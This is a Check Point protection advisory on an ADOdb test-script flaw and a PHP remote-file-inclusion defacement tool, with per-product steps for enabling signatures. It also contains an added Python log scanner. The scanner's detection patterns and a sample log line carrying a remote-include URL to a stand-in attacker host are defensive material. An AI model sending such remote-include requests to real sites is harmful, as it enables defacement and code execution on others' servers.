Update Protection against Multiple PHP-based Vulnerabilities

Check Point Reference: CPAI-2006-011
Date Published:
Severity:
Last Updated:
Source: FrSIRT/ADV-2006-0101
SANS organization
Industry Reference(s): CVE-2006-0146
Protection Provided by: VPN-1
  • NGX R60
  • NG with Application Intelligence R55W
  • NG with Application Intelligence R55
  • NG with Application Intelligence R54
InterSpect
  • NGX
  • 2.0 and 1.x
Who is Vulnerable?
ADOdb version 4.68 (for PHP) and prior
Defacing Tool 2.0 by r3v3ng4ns
Vulnerability Description
ADOdb is a database abstraction library for PHP. A vulnerability was detected in ADOdb due to the presence of an insecure ADOdb script that can be exploited by remote attackers to execute malicious PHP commands on the target system.
The 'Defacing Tool 2.0 by r3v3ng4ns' is a suite of PHP-based scripts intended to deface Web sites by leveraging PHP remote file inclusion. Reports of aggressive scanning activity leveraging this tool suite have recently been on the rise. Using this tool, attackers can deface PHP-enabled Web sites.
Update/Patch Available
ADOdb:
Upgrade to ADOdb version 4.70:
http://sourceforge.net/project/showfiles.php?group_id=42718
Vulnerability Details
ADOdb vulnerability: An input validation error exists in the "tests/tmssql.php" test script that does not properly validate the "do" parameter. This could be exploited by attackers to call arbitrary PHP functions.

Defacing Tool 2.0 by r3v3ng4ns: This tool targets Web hosts that enable the use of remote includes. Various reports received lately have indicated site defacement leveraging this tool.
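
As an added example (not part of the Check Point advisory and not its Worm Catcher signatures), the following Python sketch flags the two request shapes described above in web server access logs: requests to "tests/tmssql.php", with or without the "do" parameter, and parameters whose value is a remote URL. The combined log format, the finding labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter values that point at a remote resource (remote-include shape).
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def classify(line):
    """Return a list of findings (hypothetical labels) for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    path = unquote(target.path).lower()
    # parse_qsl percent-decodes names and values, so encoded URLs are seen.
    params = parse_qsl(target.query, keep_blank_values=True)
    findings = []
    # ADOdb: the advisory names tests/tmssql.php and its "do" parameter.
    if path.endswith("/tests/tmssql.php"):
        if any(k.lower() == "do" for k, _ in params):
            findings.append("adodb-test-script-do-param")
        else:
            findings.append("adodb-test-script-access")
    # Remote file inclusion: any parameter whose value is a remote URL.
    if any(REMOTE_VALUE_RE.match(v.strip()) for _, v in params):
        findings.append("remote-include-parameter")
    return findings

def scan(lines):
    """Map 1-based line number -> findings, for lines with any finding."""
    hits = {}
    for n, line in enumerate(lines, 1):
        found = classify(line)
        if found:
            hits[n] = found
    return hits

# Constructed sample log lines (documentation addresses, example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2006:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Feb/2006:10:00:05 +0000] "GET /adodb/tests/tmssql.php?do=placeholder HTTP/1.0" 200 64',
    '192.0.2.44 - - [01/Feb/2006:10:00:09 +0000] "GET /index.php?page=http%3A%2F%2Fattacker.example%2Finc.txt HTTP/1.0" 200 90',
    '192.0.2.77 - - [01/Feb/2006:10:00:12 +0000] "GET /lib/adodb/TESTS/tmssql.php HTTP/1.1" 404 12',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(findings))
```

Any hit on the test script path, even one answered with a 404, indicates scanning; a 200 response means the ADOdb test scripts are deployed on a reachable web root and should be removed or upgraded.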

Protection Overview
The Update enables the HTTP Worm Catcher to detect and block attempts to exploit these vulnerabilities, based on predefined worm signatures.

To configure the defense, select your product from the list below and follow the related protection steps.

Additional Information
The update also includes the following protections:

  • Oracle XDB FTP Buffer Overflow (CPAI-2006-008)
  • Microsoft Windows Embedded Opentype Fonts (EOT) (CPAI-2006-010)
  • HP OpenView Remote Command Execution (CPAI-2006-012)
  • Oracle XDB HTTP Buffer Overflow (CPAI-2006-013)
  • Apache Format String1 and string2 (CPAI-2006-014)

VPN-1 NGX R60

How Can I Protect My Network?
Users of VPN-1 NGX R60 should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. In the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. Enable the following patterns:
HP ADOdb Test Scripts
PHP shell/web defacement tool
3. Install security policy on all modules. 
 

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
HP ADOdb Test Scripts
PHP shell/web defacement tool

InterSpect NGX

How Can I Protect My Network?
Users of InterSpect NGX should update their systems: In the left pane from the drop-down list, select Profiles > SmartDefense Service and click the Online Update button.

To enable the protection:

1. In the left pane, select Profiles > Default Protection and select the Web Intelligence page of the profile.  

2. In the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
3. On the Worm Patterns list, enable:
PHP shell Web defacement tool
PHP ADOdb Test Scripts
4. Install security policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP shell Web defacement tool
PHP ADOdb Test Scripts

VPN-1 NG with Application Intelligence R55W

How Can I Protect My Network?

Users of VPN-1 NG with Application Intelligence R55W and users of VPN-1 NGX R60 should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:
1. On the Web Intelligence tree, click Malicious Code > General HTTP Worm Catcher.
2. In the Worm Patterns table, enable:
PHP ADOdb Test Scripts
php shell web defacement tool

3. Install security policy on all modules.

How Do I Know if My Network is Under Attack?
SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP ADOdb Test Scripts
php shell web defacement tool

VPN-1 NG with Application Intelligence R55/R54

How Can I Protect My Network?
Users of VPN-1 NG with Application Intelligence R55/R54 should update their SmartDefense by clicking Update Now in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Application Intelligence > Web and enable General HTTP Worm Catcher.
2. Enable the following patterns:
PHP ADOdb Test Scripts
PHP shell/web defacement tool

3. Install security policy on all modules.

How Do I Know if My Network is Under Attack?

SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP ADOdb Test Scripts
PHP shell/web defacement tool

InterSpect 2.0, 1.x

How Can I Protect My Network?
Users of InterSpect 2.0, 1.x should update their SmartDefense by clicking Online Update in the SmartDashboard General window.

To enable the protection:

1. On the SmartDefense tree, click Malicious Code > General HTTP Worm Defender.
2. Enable the following patterns:
PHP ADOdb Test Scripts
PHP shell/web defacement tool
3. Install policy on all modules.

How Do I Know if My Network is Under Attack?

SmartView Tracker will log the following entries:

Attack Name: HTTP Worm Catcher
Attack Information:
PHP ADOdb Test Scripts
PHP shell/web defacement tool